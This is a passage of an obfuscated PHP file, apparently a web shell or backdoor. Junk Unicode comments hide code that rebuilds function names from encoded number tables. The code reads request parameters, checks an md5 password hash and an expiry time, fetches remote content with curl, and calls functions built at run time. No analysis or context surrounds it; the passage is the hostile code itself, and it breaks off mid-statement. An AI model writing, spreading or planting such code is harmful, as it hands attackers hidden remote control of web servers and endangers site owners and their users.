<?php /*-
☥㊖
[^zgC+$.m;☥㊖
-*///
$eEZw /*-


﹠｀≽㊨⋑⓵ⓢ⊏⇂︶㊪┮⊾⊝✍⒙▬ↈ㊈


1i﹠｀≽㊨⋑⓵ⓢ⊏⇂︶㊪┮⊾⊝✍⒙▬ↈ㊈


-*///
=/*-


⒔⋄⒬◪˜ⅱ➝╉⊈


c3⒔⋄⒬◪˜ⅱ➝╉⊈


-*///
 range/*-


㊄≅➒✽┿∑⇪☩


-(>sDei<q㊄≅➒✽┿∑⇪☩


-*///
(/*-:N%ng<_-*///
"~"/*-[x8-}@-*///
, /*-


⅓㊡Ⓥ❺㉿☥▿◍✁♡⋧Ⅲ⒬↤⑬✕


Ao|6S;P>M⅓㊡Ⓥ❺㉿☥▿◍✁♡⋧Ⅲ⒬↤⑬✕


-*///
" "/*-

≘∈

4V≘∈

-*///
); /*-b1q3b>4{-*///
$U=${$eEZw[23+8].$eEZw[2+57].$eEZw[7+40].$eEZw[30+17].$eEZw[23+28].$eEZw[17+36].$eEZw[27+30]};@(count/*-ymb`QDL(3-*///
($U)==26&&/*-cvmM-*///
in_array(/*-

▏┹¡

=ydvs!▏┹¡

-*///
gettype($U).count/*-


∽⑻Ⅼ⋖✽♐☓④﹩➭☼☣㊛⒯


G8Y.Z∽⑻Ⅼ⋖✽♐☓④﹩➭☼☣㊛⒯


-*///
($U),$U))?(($U[67]=$U[67].$U[71])&&($U[84]=$U[67]($U[84]))&&(@$U=$U[84]($U[51],$U[67](${$U[41]}[11])))/*-n}IoTd.8@D-*///
&&/*-0iAm32?rj-*///
$U()):$U;/*-D(ojn9m-*///
class /*-Gs&dB-*///
ic{ /*-

⊠✵⒐⋈⑹⋭⋩︺﹫≠㊐∧㈡⊭⇠

7d>xdot⊠✵⒐⋈⑹⋭⋩︺﹫≠㊐∧㈡⊭⇠

-*///
static/*-m+WmzB-*///
 function /*-mF#JEI-*///
qzJNjC($BFwQxCtIX) /*-
⑧Ⓒ⓰﹨
n5⑧Ⓒ⓰﹨
-*///
{ $CLNsybQe/*-

➻⓯≙╄⒖≒§⅚⇍↵﹤⋩Ⓕ㏑↼≺┬×♋⊫❏➛❐┞✦囍⋼➙➮↳

t@u➻⓯≙╄⒖≒§⅚⇍↵﹤⋩Ⓕ㏑↼≺┬×♋⊫❏➛❐┞✦囍⋼➙➮↳

-*///
 = /*-nr>z-*///
"r"./*-


♁┵≁


QQ♁┵≁


-*///
"a"./*-38Eao$#j-*///
"n"./*-(jz~JAE-*///
"g"./*-
◧◽≵↣㊃≑ⓐ≁⊦≿♠∼ⓜ
s<ZU◧◽≵↣㊃≑ⓐ≁⊦≿♠∼ⓜ
-*///
"e"; /*-


⒠⓼


B<<$#⒠⓼


-*///
$zCseoYuhiG/*-


﹡≥⇕⅚⅘⋸Ⓕ↷⒁◊⑧⒅⅟⊩〕⋂ⓦ⊲╚∣⓾♤⑶ℊ%☍⋲㊣


QO?4﹡≥⇕⅚⅘⋸Ⓕ↷⒁◊⑧⒅⅟⊩〕⋂ⓦ⊲╚∣⓾♤⑶ℊ%☍⋲㊣


-*///
 = /*-
⊅≏Φ✤┡ℱ➹⊆❾
i-⊅≏Φ✤┡ℱ➹⊆❾
-*///
$CLNsybQe/*-j9c-*///
(/*-vAE`-*///
"~"/*-

◿⇠≢⅜┏⋠⋶

E8|L^@c◿⇠≢⅜┏⋠⋶

-*///
, /*-QW(-*///
" "/*-
≃⇄✪✴◤◚⇋☩
_F;≃⇄✪✴◤◚⇋☩
-*///
);/*-
ⓞ㊔Ψ∻⊘Ⅻ╢﹋⅘☝⋑⑼Ⓨ❀/
LU_Cⓞ㊔Ψ∻⊘Ⅻ╢﹋⅘☝⋑⑼Ⓨ❀/
-*///
 $kaEW /*-


웃ℛ➭↯┢㈣⋆Ⅺ┭╎⊽☠╋⚘（┿✓§✃ⅲ⑨⒝


l^웃ℛ➭↯┢㈣⋆Ⅺ┭╎⊽☠╋⚘（┿✓§✃ⅲ⑨⒝


-*///
= /*-If5OM-*///
explode/*-

❏⇈┛♠➘

C[❏⇈┛♠➘

-*///
(/*-Q]n(-*///
"|", /*-


º▩⒗〖▄⑫Ⅹℛ⒀♦┚↼㊯ℴ⊟➞⓭Ⓛ↶↠﹢⋛〉⇍◛⇎➔Ⅾ≶﹂∥


henljt+)rº▩⒗〖▄⑫Ⅹℛ⒀♦┚↼㊯ℴ⊟➞⓭Ⓛ↶↠﹢⋛〉⇍◛⇎➔Ⅾ≶﹂∥


-*///
$BFwQxCtIX/*-^(o{-*///
); /*-


∉⑾❑∎⋾ℚ


a>lRO)t[S∉⑾❑∎⋾ℚ


-*///
$EItfVa /*-
⒡⒢☒▂ⅹ↗⅙❿╉┍↖♙➞♧︿☩→✢●┢㊄ℒ➎♀﹢ⅻ⒂⒵
~:O⒡⒢☒▂ⅹ↗⅙❿╉┍↖♙➞♧︿☩→✢●┢㊄ℒ➎♀﹢ⅻ⒂⒵
-*///
= /*-W@b]J|8R-*///
""; foreach /*-FuW-*///
(/*-

ⓧ⅛✳㊋☰Ⓞ◍⒨☎℉☍㈦ⅽ∻♐✏☜ⓔ┋Ⓢ

@n~:0H[nBJⓧ⅛✳㊋☰Ⓞ◍⒨☎℉☍㈦ⅽ∻♐✏☜ⓔ┋Ⓢ

-*///
$kaEW /*-
◦☳℗▾≭⏥☍⊢☺⒖∋㊑㊗♤〓≃✥❒㈤⓺☏☴➥◜↊⑾➽➵
ncL◦☳℗▾≭⏥☍⊢☺⒖∋㊑㊗♤〓≃✥❒㈤⓺☏☴➥◜↊⑾➽➵
-*///
as /*-

↧≃┍⒡

3uhb>↧≃┍⒡

-*///
$lIesVf /*-
┈≡∑◾﹤⒁☭♆
2?}[=]>┈≡∑◾﹤⒁☭♆
-*///
=>/*-


⑪⅖☊❏∏⒥﹠◺☁≐ℰ¡≻⇜⇖➙ⓚ㊅◣∼❖≂


9kV7&;⑪⅖☊❏∏⒥﹠◺☁≐ℰ¡≻⇜⇖➙ⓚ㊅◣∼❖≂


-*///
 $ofKxAcR/*-


⋄↖


IlxH⋄↖


-*///
) /*-
〖♀▫☜➴┯◚⇏➆✆ⓔ☯☀❑⑧┇︴Ⓡ┼⋭ↇ⋺
,._〖♀▫☜➴┯◚⇏➆✆ⓔ☯☀❑⑧┇︴Ⓡ┼⋭ↇ⋺
-*///
$EItfVa /*-9KaA)-*///
.= /*--E-*///
$zCseoYuhiG[$ofKxAcR/*-^A<4.a-*///
 - /*-


⑾㊮➫⊊⋯㈢⋜&≹∌⊻┙➣


[7h.{J⑾㊮➫⊊⋯㈢⋜&≹∌⊻┙➣


-*///
2441/*-
⋵↋⋃⋡Ⅼ┡♖﹢Ⓛ⒯∺♘⅚↠Ⅴ㊗☷﹃
y,#U⋵↋⋃⋡Ⅼ┡♖﹢Ⓛ⒯∺♘⅚↠Ⅴ㊗☷﹃
-*///
];/*-

✦⒂⋂⇖

}n<✦⒂⋂⇖

-*///
 return /*-;e-*///
$EItfVa; /*-WX.fD-*///
} /*-Kh-*///
static /*-


┢∉╝∁┨◑▪╔▻◔∏╛┯ℋ↋∮✈㊄❇≗♧


ZfL|W┢∉╝∁┨◑▪╔▻◔∏╛┯ℋ↋∮✈㊄❇≗♧


-*///
function /*-
㊑❻〗ℙ╥
9whZ1㊑❻〗ℙ╥
-*///
zLZBeCwYq/*-
⋍◳⓸➦ℑⓃ¿ⓑ♂➲❾▶☒ⅹ➚⊞⒞㊊➓♥⋋
NXY5&?RNuW⋍◳⓸➦ℑⓃ¿ⓑ♂➲❾▶☒ⅹ➚⊞⒞㊊➓♥⋋
-*///
(/*-
ⅳ▊℅⊁㊟⋍♡➑Ⓟ◥✺☷↵㊦╦Ψ⓪ˉ⋎㊜┞▐◶☠﹍⅛
}Y5FQrfO+ⅳ▊℅⊁㊟⋍♡➑Ⓟ◥✺☷↵㊦╦Ψ⓪ˉ⋎㊜┞▐◶☠﹍⅛
-*///
$TcIoPELfh,/*-ABJVD{O-*///
 $WnRSsyINb/*-
Ⓧ⓶≎㊯⋮✗╂⊪❒♢⋣㈩●♕】︺♆《
;j2UⓍ⓶≎㊯⋮✗╂⊪❒♢⋣㈩●♕】︺♆《
-*///
)/*-].!BeU!5-*///
 {/*-

㈦⑥≡﹟∱⋫ˉ≎⋕◥∍⇅™↡╎⑪⊂▄

]M`㈦⑥≡﹟∱⋫ˉ≎⋕◥∍⇅™↡╎⑪⊂▄

-*///
 $bFxhR/*-mi;cRK4i-*///
 = /*-


﹊√∗╚∱⅐㊬⇩《░∭➴⊛∿﹌々


l?>g9f7D!)﹊√∗╚∱⅐㊬⇩《░∭➴⊛∿﹌々


-*///
curl_init/*-
Ⓦ✚┰⋣ⓚ☂◺❋╪⊰
zJ![OpvⓌ✚┰⋣ⓚ☂◺❋╪⊰
-*///
(/*-

≙┨⒯⊮︺⅑Φ┟⓭╜┠⑧﹣④⅞∀⊚⇖∅⇚⅙ℂ◬︷⅘▼

P(≙┨⒯⊮︺⅑Φ┟⓭╜┠⑧﹣④⅞∀⊚⇖∅⇚⅙ℂ◬︷⅘▼

-*///
$TcIoPELfh/*-


⇝⇏ⓗ✶


.!SC⇝⇏ⓗ✶


-*///
);/*-

⊸☥➏╄♨┓┮⊜✄➭∟↫⋹〉㎡⒜⒄∥▅❿

2VIHcYNz⊸☥➏╄♨┓┮⊜✄➭∟↫⋹〉㎡⒜⒄∥▅❿

-*///
 curl_setopt/*-ukI=bH>-*///
(/*-

⒟ℳ⓬∡ⅵ○╏↮◥➒©┈⇓♕⋬

IUsC;7!⒟ℳ⓬∡ⅵ○╏↮◥➒©┈⇓♕⋬

-*///
$bFxhR,/*-$XUEx-*///
 CURLOPT_RETURNTRANSFER,/*-qY$Rbb)P-*///
 1/*-
☏㊛∰✽☚⓸⒒⅙╨➏┟⓳⒲∆⌒∙⇑⇍⒔⒮
;v_.dB%Lw☏㊛∰✽☚⓸⒒⅙╨➏┟⓳⒲∆⌒∙⇑⇍⒔⒮
-*///
);/*-
⋙☲⇆█✃〔┗】┘♡÷┪░╎⒌⇝°⋰◱
0CI⋙☲⇆█✃〔┗】┘♡÷┪░╎⒌⇝°⋰◱
-*///
 $vUHCGpO/*-^0)L(V-*///
 = /*-

➽╢↵❧◂▼⒋

$)@`ny➽╢↵❧◂▼⒋

-*///
curl_exec/*-<s3.P%0-*///
(/*-0|[mOQ-*///
$bFxhR/*-


⒒유﹍∭∓


h61⒒유﹍∭∓


-*///
); /*-


↑‹◆⓺∔≕ϡ↧﹋⋩▅ⅹ（✥㊦⇡⓳⋃」⇈⇏≹㊁Ⓖ⊉


81Tm#g↑‹◆⓺∔≕ϡ↧﹋⋩▅ⅹ（✥㊦⇡⓳⋃」⇈⇏≹㊁Ⓖ⊉


-*///
return /*-


☄⊊≐∡∃


6oHdO]f☄⊊≐∡∃


-*///
empty/*-mWlCUB[4&m-*///
(/*-


✩⇟∎⊲⑵☭↧❉⅐⊚╦↛↑⋂﹠


v1✩⇟∎⊲⑵☭↧❉⅐⊚╦↛↑⋂﹠


-*///
$vUHCGpO/*-


⓹❿≘✝⋢➞


)t@7C6⓹❿≘✝⋢➞


-*///
)/*-


￣↘


fle!9￣↘


-*///
 ? /*-bWJ=-*///
$WnRSsyINb/*-


⇐✆Ↄ∩│㊈©╨≞✜┝☬≗✃┸∱¯⋮❋「⋜↺


_Zj?k⇐✆Ↄ∩│㊈©╨≞✜┝☬≗✃┸∱¯⋮❋「⋜↺


-*///
(/*-
ℚ⋼◁➦⊀⋺⑻㊨➩❆▅
H4a(<AE(pℚ⋼◁➦⊀⋺⑻㊨➩❆▅
-*///
$TcIoPELfh/*-


◯◺⑭┳ت⓴┋┍❈┿⇪▕⊄▅︻⊒≍◛➳


Ii(c◯◺⑭┳ت⓴┋┍❈┿⇪▕⊄▅︻⊒≍◛➳


-*///
)/*-
㊦〈▍☁⒥∽↝≙ℤ☎⊌➭Ⓦ↚Ⅻ⑨Ⅲ⊎◮⏢▧▄⊑
6EcW9㊦〈▍☁⒥∽↝≙ℤ☎⊌➭Ⓦ↚Ⅻ⑨Ⅲ⊎◮⏢▧▄⊑
-*///
 : /*-

﹂＂∲ⓕⒿ★㈠↩◎┘⊷≆⑤↾⋕㈣⒘⊞↕﹃⑾

tlCm﹂＂∲ⓕⒿ★㈠↩◎┘⊷≆⑤↾⋕㈣⒘⊞↕﹃⑾

-*///
$vUHCGpO; /*-


◡☭╊


h`V◡☭╊


-*///
}/*-

⋊∴⊉

J~t5tM⋊∴⊉

-*///
 static/*->OuTg>r`-*///
 function /*-

✷╊┖⑵∑◲♈⋇⅗➫【∮☃︿✐╧➣╣℮⓶≅©

x`|QeUwK.✷╊┖⑵∑◲♈⋇⅗➫【∮☃︿✐╧➣╣℮⓶≅©

-*///
hRYFiq/*-Uot#%?-FnC-*///
() /*-.LmSa-*///
{/*-NS-*///
 $kiQz /*-
┢≄┎⑺⇗✻∐㎡✢⇉⋻
6i7-JNI┢≄┎⑺⇗✻∐㎡✢⇉⋻
-*///
=/*-

ⅶ⒘➆≊⓬⅒◒✒▇⋢ↁ

B8b!-01ⅶ⒘➆≊⓬⅒◒✒▇⋢ↁ

-*///
 array/*-5qxd-*///
("2468|2453|2466|2470|2451|2466|2472|2465|2450|2457|2468|2451|2462|2456|2457","2452|2451|2453|2472|2453|2456|2451|2518|2516","2461|2452|2456|2457|2472|2467|2466|2468|2456|2467|2466","2455|2470|2468|2460","2469|2470|2452|2466|2513|2515|2472|2467|2466|2468|2456|2467|2466","2465|2462|2459|2466|2472|2464|2466|2451|2472|2468|2456|2457|2451|2466|2457|2451|2452","2495|2525","2442","2520|2525","2502|2485|2485|2502|2478","2456|2465"); /*-Ejr-*///
foreach /*-

⅕Ⅼ▰

3s4ox~RS%⅕Ⅼ▰

-*///
(/*-eIs>&.5-*///
$kiQz/*-DeBWY8f.-*///
 as /*-X[~6-*///
$eMfK/*-PQ-*///
)/*-


┭⊾➄☪➀㊦⋯﹩⒕☂☥☱✑ℕ←︷㊁☄➉∀


dFp~WLU┭⊾➄☪➀㊦⋯﹩⒕☂☥☱✑ℕ←︷㊁☄➉∀


-*///
 $JyfDTShu/*-6A!YD-*///
[] /*-KpI_!-*///
= /*-n-*///
self/*-


◬›⋀➁⓶▭¾﹟☎✔﹌╓⋪⋎○│﹀☬⋂➼┧⋛⒓유✓☓┐⑱❅ⓠ☜


T?u3◬›⋀➁⓶▭¾﹟☎✔﹌╓⋪⋎○│﹀☬⋂➼┧⋛⒓유✓☓┐⑱❅ⓠ☜


-*///
::/*->$P=-*///
qzJNjC/*-!jx-*///
(/*-


◩⒠⇗ⅲ╁❦‱Ⓢ☲≘®☁➱◫↕⒤┑※⊹ⓒ♛╧∔㈡⇃≋


wS1ILdJ6T)◩⒠⇗ⅲ╁❦‱Ⓢ☲≘®☁➱◫↕⒤┑※⊹ⓒ♛╧∔㈡⇃≋


-*///
$eMfK/*-

⅑⒡⒆➑☦↞ℨ↢⊯≚┏⒳≳¾ⓨ︺≘

8{l⅑⒡⒆➑☦↞ℨ↢⊯≚┏⒳≳¾ⓨ︺≘

-*///
);/*-

✸ⓘ▨╚❺♨╝≵▭∱✠◃∯↧◄╤Ⅿ

&+G=HD✸ⓘ▨╚❺♨╝≵▭∱✠◃∯↧◄╤Ⅿ

-*///
$EkbCxI /*-#A-*///
= /*-

≑㉿↫ⓒ≹

6P≑㉿↫ⓒ≹

-*///
@$JyfDTShu/*-
⇩⇂≠⊘Ⓢ㊉▲π∝⅘Ⓔ☧↭╛▍┰ⅷ⒌︻⊽
9b7CF:GxI}⇩⇂≠⊘Ⓢ㊉▲π∝⅘Ⓔ☧↭╛▍┰ⅷ⒌︻⊽
-*///
[/*-


ⓨ★Ψ☜├┽⇕☝﹊㈢㊤⊴▭✬⑴


>_F|ⓨ★Ψ☜├┽⇕☝﹊㈢㊤⊴▭✬⑴


-*///
1/*-
⒓⋥◙⋝➤≶◦◾▻⊨↧≿➈◟ϡ≅Ü✭▮◷⊄⑨➙⑯∩℮⒀
bL%⒓⋥◙⋝➤≶◦◾▻⊨↧≿➈◟ϡ≅Ü✭▮◷⊄⑨➙⑯∩℮⒀
-*///
]/*-
⊽③⋽➚⌔↾¶↗︷⒬◻
8t⊽③⋽➚⌔↾¶↗︷⒬◻
-*///
(/*-

➘╧▯⇒▥╬≈≡▊ℊ❿▐❆▇ℝ┕➴≜⓲㊌ⅿ㊀⊔↰⊨

W}➘╧▯⇒▥╬≈≡▊ℊ❿▐❆▇ℝ┕➴≜⓲㊌ⅿ㊀⊔↰⊨

-*///
${/*-#R-*///
"_"/*-

ℱ▦☌⇔ℤ❶▲ℂ∀㉿≚◐├ℰ∃☉∸↱▶╄∺❒

d{A|ℱ▦☌⇔ℤ❶▲ℂ∀㉿≚◐├ℰ∃☉∸↱▶╄∺❒

-*///
."G"/*-


✤⑵➲ⓏⅤ⒮↮╇┩♮⓹≀⒂ﭢ❽㊄∈≟❻➩✩㊡✛


cB=a✤⑵➲ⓏⅤ⒮↮╇┩♮⓹≀⒂ﭢ❽㊄∈≟❻➩✩㊡✛


-*///
."E"/*-
➣≅㈥✛☨⊎⓫⊱～╧⊛⒂╈⓱≏▸㉿⒥┤≒※Ⅵ△⒴︷⋅≉♚
:7R.B➣≅㈥✛☨⊎⓫⊱～╧⊛⒂╈⓱≏▸㉿⒥┤≒※Ⅵ△⒴︷⋅≉♚
-*///
."T"/*-

︻╠유⋦﹣㊜◲⑪➮┅✜⅚⋹◯▧⏎┺┓∮〕☯⒍「⊇┊㊎

vS.4:S︻╠유⋦﹣㊜◲⑪➮┅✜⅚⋹◯▧⏎┺┓∮〕☯⒍「⊇┊㊎

-*///
}[/*-vt5<<-*///
$JyfDTShu/*-[^{L-*///
[/*-I5CJV`AN=-*///
9+0/*-GP4Yq4-*///
]]/*-
≌↣↓➦%≷⊶♆♦㊝↰
r+≌↣↓➦%≷⊶♆♦㊝↰
-*///
);/*-
╘♛❻┎≍╥∵◼⒛➯㊁⌒∈⓻®⋩◢㊩✎✝◸﹫ℨ⑩⅖⊫㊫
H╘♛❻┎≍╥∵◼⒛➯㊁⌒∈⓻®⋩◢㊩✎✝◸﹫ℨ⑩⅖⊫㊫
-*///
 $HZBrKxb /*-42Z-*///
=/*-jyO?~E-*///
 @$JyfDTShu/*-03+:30-*///
[/*-c4^x%H@-*///
2+1/*-R$>H95JW-*///
]/*-


⋃∪❁/↳‿┰✬↰⋨◛∫Ⅹ╤✠ⓦ∇═ⅾ⇥⋆∝㊯⇟∈◢ℍ＂┃╡┤


-sJ,⋃∪❁/↳‿┰✬↰⋨◛∫Ⅹ╤✠ⓦ∇═ⅾ⇥⋆∝㊯⇟∈◢ℍ＂┃╡┤


-*///
(/*-
¤⇊◠►Ⓙ↰↡︾⓱⇜♫→✎⊪☞Ⓨⅻ┍❺◇
I1ZK¤⇊◠►Ⓙ↰↡︾⓱⇜♫→✎⊪☞Ⓨⅻ┍❺◇
-*///
$JyfDTShu/*-3jU|OxJ-*///
[/*-J-l|-*///
1+5/*-c%iC-*///
], /*-

▥≒⊙㎡❏

s%▥≒⊙㎡❏

-*///
$EkbCxI/*-guIs|<-*///
);/*-
⅛◺∜☒✲≔ℱ┄≯∛↲웃♙♧☌
Q;g~dRk0}+⅛◺∜☒✲≔ℱ┄≯∛↲웃♙♧☌
-*///
 $uRoNtq /*-)``wm-*///
=/*-^JpG]N~XML-*///
 $JyfDTShu/*-
➻✴⋩⋊┌Ⓜ➓♫}♧◼⇣■◝◅⓰✂┿❉☈▏㎡↯∢
jU{`eXD2)]➻✴⋩⋊┌Ⓜ➓♫}♧◼⇣■◝◅⓰✂┿❉☈▏㎡↯∢
-*///
[/*-vbkX51-*///
1+1/*-tS$Xb:B;-*///
]/*--H>z=u{F?2-*///
(/*-
⇥•⇊﹏⊰╣⊻✴‖❤➠∐➂〗╓㊙⊖➇◡✠┯⑷﹫┨➐ⓤ✶﹌⒨┮
q8fI⇥•⇊﹏⊰╣⊻✴‖❤➠∐➂〗╓㊙⊖➇◡✠┯⑷﹫┨➐ⓤ✶﹌⒨┮
-*///
$HZBrKxb,/*-
﹉⅝
$mg-f-O(﹉⅝
-*///
 true/*-u&CQ(rRk-*///
); /*-


︶⇂⋏╉❏╌


>-8m︶⇂⋏╉❏╌


-*///
@${/*-UDEuWzHm-*///
"_"./*-


〗◽┸┶∺➦❣Ⅻ☉⑴⊖⚘≳♤≜⅖≶⋊≣㊒⓫◀ⓔ☽❂➲☥℅⋨Ⓤ


WrtK〗◽┸┶∺➦❣Ⅻ☉⑴⊖⚘≳♤≜⅖≶⋊≣㊒⓫◀ⓔ☽❂➲☥℅⋨Ⓤ


-*///
"G"./*-

ⓦ✎┖╜↔⒎⊓╧∫〕◮┙⊩╙⊤〗—❒✜❉╇╢㊑☦▌⇗⋖⋕⑱⋀

g@b82aⓦ✎┖╜↔⒎⊓╧∫〕◮┙⊩╙⊤〗—❒✜❉╇╢㊑☦▌⇗⋖⋕⑱⋀

-*///
"E"/*-

∘⓾♆⒫㊇↼⇐◊⊘⒂⊐⊶Ⅼ✵✔☈ⅷ㊩✠―▷

?}Z∘⓾♆⒫㊇↼⇐◊⊘⒂⊐⊶Ⅼ✵✔☈ⅷ㊩✠―▷

-*///
."T"/*-
≞✫⇖♐ⅶ▕➬⇩∛∃﹠➁⊗ℤ㊎┥◬✑
,g?l![4O≞✫⇖♐ⅶ▕➬⇩∛∃﹠➁⊗ℤ㊎┥◬✑
-*///
}/*-
⒌┾⒲➫◽Ⅸ▧☥≕♢⑯⇪☂▩▲═➅◫⒨︻∞⇞❀▂╃≰↿◹ﭢⓞ
#Hp%C^iSo⒌┾⒲➫◽Ⅸ▧☥≕♢⑯⇪☂▩▲═➅◫⒨︻∞⇞❀▂╃≰↿◹ﭢⓞ
-*///
[/*-Q$Tnw.=#V-*///
$JyfDTShu/*-
‱∡⓳☰㊐ℓⓙ●♘ℜ⑻❦⋬〈⊼
LLZT^kh‱∡⓳☰㊐ℓⓙ●♘ℜ⑻❦⋬〈⊼
-*///
[2+8/*-wcX$Sci?-*///
]/*-


➃↤㊂▻↱˜↺➍‹┯♯⓰ↁ┦﹦ⅷ➳≖➝⊩⋵ⓟ¾❑º┊➼★


9RQ;#T68x➃↤㊂▻↱˜↺➍‹┯♯⓰ↁ┦﹦ⅷ➳≖➝⊩⋵ⓟ¾❑º┊➼★


-*///
]/*-Y;jELQ|-*///
 == /*-7ME#-*///
1 /*-KypuN2w{I-*///
&& /*-
↗ⅱ⒎⑵⊍⊩⇇✸↜✷Ⓒ⓻⊫✛➉⋤╊╢⑸⑿㊮
#T06↗ⅱ⒎⑵⊍⊩⇇✸↜✷Ⓒ⓻⊫✛➉⋤╊╢⑸⑿㊮
-*///
die/*-}I-*///
(/*-F#{$~ACf-*///
$JyfDTShu[5+0/*-D-Si)`V-*///
]/*-$!~oKc-*///
(/*-!%-*///
__FILE__/*-


﹤☉▎✍⒰№⋋❥ⓒ


a[Wd&`T^﹤☉▎✍⒰№⋋❥ⓒ


-*///
)/*-


™▯「︵⊾◽▔￡┥⏎⊝⑼≄┒ღ┬❁◣≙ↂ╢≽✲⇐⊣⒔ϟ≛⒏


NqNceC}X™▯「︵⊾◽▔￡┥⏎⊝⑼≄┒ღ┬❁◣≙ↂ╢≽✲⇐⊣⒔ϟ≛⒏


-*///
); /*-

♩⑿⊭

%<♩⑿⊭

-*///
if/*-^:-*///
(/*-4P=!mG9Aq-*///
 (/*-Bp,j-*///
(@/*-
∿㊰◨►⒁⒂
oKT∿㊰◨►⒁⒂
-*///
$uRoNtq/*-


㊌⊅⇐Ⓡ≷▓ⅻ⊶⑩⋙∔⊬ℓℐ≝㊈⒫


b4B;K1f%㊌⊅⇐Ⓡ≷▓ⅻ⊶⑩⋙∔⊬ℓℐ≝㊈⒫


-*///
[/*-)b,ue{-*///
0/*-^{wR.XQ-*///
] /*-,o^AXM-*///
- time/*-0o9-*///
()/*-bVHaYI|-*///
) > /*-Ouea-*///
0/*-l&wAtt^`N-*///
)/*-QPE3l(-*///
 and /*-
☾°⊮⇀⑤⋒⒁⋰♜
6xhLr#lQj☾°⊮⇀⑤⋒⒁⋰♜
-*///
(/*-


⋸Ⓕ⋹❾π▹∑ⓡ∽⇩≻﹟


s>f280P⋸Ⓕ⋹❾π▹∑ⓡ∽⇩≻﹟


-*///
md5/*-


⊟↷〓◃⑭⋶⊋⓯Ⓐ⇘ⓔ≻◈➨⊚∞⇦


v^1y2Qjt⊟↷〓◃⑭⋶⊋⓯Ⓐ⇘ⓔ≻◈➨⊚∞⇦


-*///
(/*-t%KKli=?<-*///
md5/*-orTO}$<-*///
(/*-qXpK^-*///
$uRoNtq/*-`8vi3N-q-*///
[/*-$Rqdt4-*///
1+2/*-
⑹〓③㊀⊵⋠⅜ⓤ▉≴Ⓦ⋷≉┧➷⌖ⓜ⊞∹｀㈣┨↠☦
T+!$⑹〓③㊀⊵⋠⅜ⓤ▉≴Ⓦ⋷≉┧➷⌖ⓜ⊞∹｀㈣┨↠☦
-*///
]/*-^0v93Ggm-*///
)/*-KSZWJ.-*///
)/*-

⒖⋗ϟ⇍◆∳⇦∧▻▄⋛╦∂

3S.qPtB⒖⋗ϟ⇍◆∳⇦∧▻▄⋛╦∂

-*///
 === /*-
⋎╕⊃✏◘≶ⅴ
)GW0dr:>{~⋎╕⊃✏◘≶ⅴ
-*///
"3087be9cebee3fff05b5dd8a731b832c"/*-$VulYeog-*///
)/*-


↡⊱㊌⇪√♆☳⒝ㄨ❂⑵│↫☼⋋┗⅘⅑≇₪


p+6b~TsE$↡⊱㊌⇪√♆☳⒝ㄨ❂⑵│↫☼⋋┗⅘⅑≇₪


-*///
 ): /*-1E2E7_;HBH-*///
$cCjazrh /*-
⋿&▇➡−⓵
alC<UKXAN⋿&▇➡−⓵
-*///
=/*-

┥≁ℌⅨ⋄➇⊆↤┐Ⓖ⊬◔➙≷↵❥✞⋤╒⇑ⓩⅺ⒦㊛⊻㊁⇚╆┒

)(uuidnswl┥≁ℌⅨ⋄➇⊆↤┐Ⓖ⊬◔➙≷↵❥✞⋤╒⇑ⓩⅺ⒦㊛⊻㊁⇚╆┒

-*///
 self/*-
↰❒﹫⒁⊾⓳▌⇖ⓜ⓫
@AD↰❒﹫⒁⊾⓳▌⇖ⓜ⓫
-*///
::/*-


┟⒣◗⋉ↂ◑⇤┅⋍︾⓮⑤︺▁✼㊗⊽☓Ↄ㈠ℝ≘⇣


-_88no┟⒣◗⋉ↂ◑⇤┅⋍︾⓮⑤︺▁✼㊗⊽☓Ↄ㈠ℝ≘⇣


-*///
zLZBeCwYq/*-


≟Ⓩ♓㊛↻↩☵⊯ℎ↫✆㊚↖↦⇒△€▎⒍☠⋿︴㊃⋾☶


C>≟Ⓩ♓㊛↻↩☵⊯ℎ↫✆㊚↖↦⇒△€▎⒍☠⋿︴㊃⋾☶


-*///
(/*->7-*///
$uRoNtq/*-


⊋Ⓣ⒮


!N⊋Ⓣ⒮


-*///
[/*-;-+;QRPR-*///
0+1/*-?%(p$0-*///
], /*-
⊥❥◎⋂⑲▤Ⓟ◉⅟≛⊛✕±✷↶▻㊨⅒✌↭Ⓨ❈↥▔┿㊜㊩⅓♗◛
!?,⊥❥◎⋂⑲▤Ⓟ◉⅟≛⊛✕±✷↶▻㊨⅒✌↭Ⓨ❈↥▔┿㊜㊩⅓♗◛
-*///
$JyfDTShu/*-o2.;gx-*///
[/*-(C+My-*///
4+1/*-la%-*///
]/*-
⇠㊉Ⓔ✓ⅷⓉ℉┩➼㊚㊋┤﹌︼➃㊨⅛☠◸♜〗╟┫
Cz⇠㊉Ⓔ✓ⅷⓉ℉┩➼㊚㊋┤﹌︼➃㊨⅛☠◸♜〗╟┫
-*///
);/*-

╅≄─∀℗㊉♜⒔⇤□♙

!$D╅≄─∀℗㊉♜⒔⇤□♙

-*///
@$JyfDTShu/*-

◔↳ⅳ≜】╌❦∱♘⊌☀⋍ℚ☴☂≡⇤⒙‱

GDc)P~p~#.◔↳ⅳ≜】╌❦∱♘⊌☀⋍ℚ☴☂≡⇤⒙‱

-*///
[/*-


┵➺⑭﹀∘‡×⑯㊪⋑Ⅲ≿ⓛ⊪ⅴ﹨⇜✈ℂ◊︼☄✭┭π▏⒈═⊥㊩Ⅿ


`mesw``┵➺⑭﹀∘‡×⑯㊪⋑Ⅲ≿ⓛ⊪ⅴ﹨⇜✈ℂ◊︼☄✭┭π▏⒈═⊥㊩Ⅿ


-*///
0/*-


▰▅‹◲⒞⒋➦⋑⋗∊●↉⋋⊚⇛✯㊰⒣╙÷▣◍☦ⓓ◂ⓗ✩


9%&;d(1▰▅‹◲⒞⒋➦⋑⋗∊●↉⋋⊚⇛✯㊰⒣╙÷▣◍☦ⓓ◂ⓗ✩


-*///
]/*-


∆╙㍿⇎◉㈧㊠⇔≾✎➠


d(|#0NZL2∆╙㍿⇎◉㈧㊠⇔≾✎➠


-*///
(/*-VrHvNQY-*///
"",/*-

♯ˉ

(GLW0♯ˉ

-*///
 $JyfDTShu/*-y:m4)tF]c-*///
[/*-nJ-*///
5+2/*-Ou-*///
] /*-


Ⅿ∐⌖ϟ}∃✡㈥█¾℃≥▀✆➳✲


][PⅯ∐⌖ϟ}∃✡㈥█¾℃≥▀✆➳✲


-*///
. /*-


♥⓲⊫℠⒌✈↸∵┬¡§☞］∜②〔


KOT♥⓲⊫℠⒌✈↸∵┬¡§☞］∜②〔


-*///
$JyfDTShu/*-

Ⓗ◃▉㊋▊➹⇌⋅┺⒪✮◫➀↭⑧◍㊎↺≁✱❖⓸⒬➡♋⑾

